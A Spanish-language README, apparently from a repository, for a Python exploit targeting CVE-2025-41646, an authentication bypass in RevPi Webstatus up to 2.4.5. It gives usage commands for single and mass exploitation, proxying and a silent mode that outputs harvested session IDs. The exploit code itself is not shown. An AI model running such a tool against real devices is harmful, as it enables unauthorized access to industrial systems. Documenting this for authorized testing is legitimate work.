
Script de explotación en Python para CVE-2025-41646, un bypass de autenticación en RevPi Webstatus <= 2.4.5. Admite explotación individual/masiva, proxy, modo silencioso y salida JSON para pruebas de penetración.
Este es un script de exploit en Python3 para CVE-2025-41646, una vulnerabilidad de Bypass de Autenticación que afecta a RevPi Webstatus <= 2.4.5.
/php/dal.phppip install -r requirements.txt
requests
urllib3 (normalmente viene con requests)
python3 cve_2025_41646_auth_bypass.py -u "http://192.168.1.100"
python3 cve_2025_41646_auth_bypass.py -l targets.txt
python3 cve_2025_41646_auth_bypass.py -u "http://192.168.1.100" --proxy "http://127.0.0.1:8080"
python3 cve_2025_41646_auth_bypass.py -u "http://192.168.1.100" --silent
python3 cve_2025_41646_auth_bypass.py -u "http://192.168.1.100" --json
solicitud/respuesta
Esta herramienta es solo para fines educativos y de pruebas de penetración autorizadas. El uso no autorizado contra sistemas sin permiso explícito es ilegal.
| Opción | Descripción |
|---|
-u, --url | URL del objetivo (ej., http://IP) |
-l, --list | Archivo que contiene una lista de objetivos |
-o, --output | Archivo de salida para guardar IDs de sesión válidos |
--proxy | Usar un proxy (http://127.0.0.1:8080) |
--json | Imprimir salida JSON sin procesar |
--silent | Modo silencioso (imprime solo el ID de sesión) |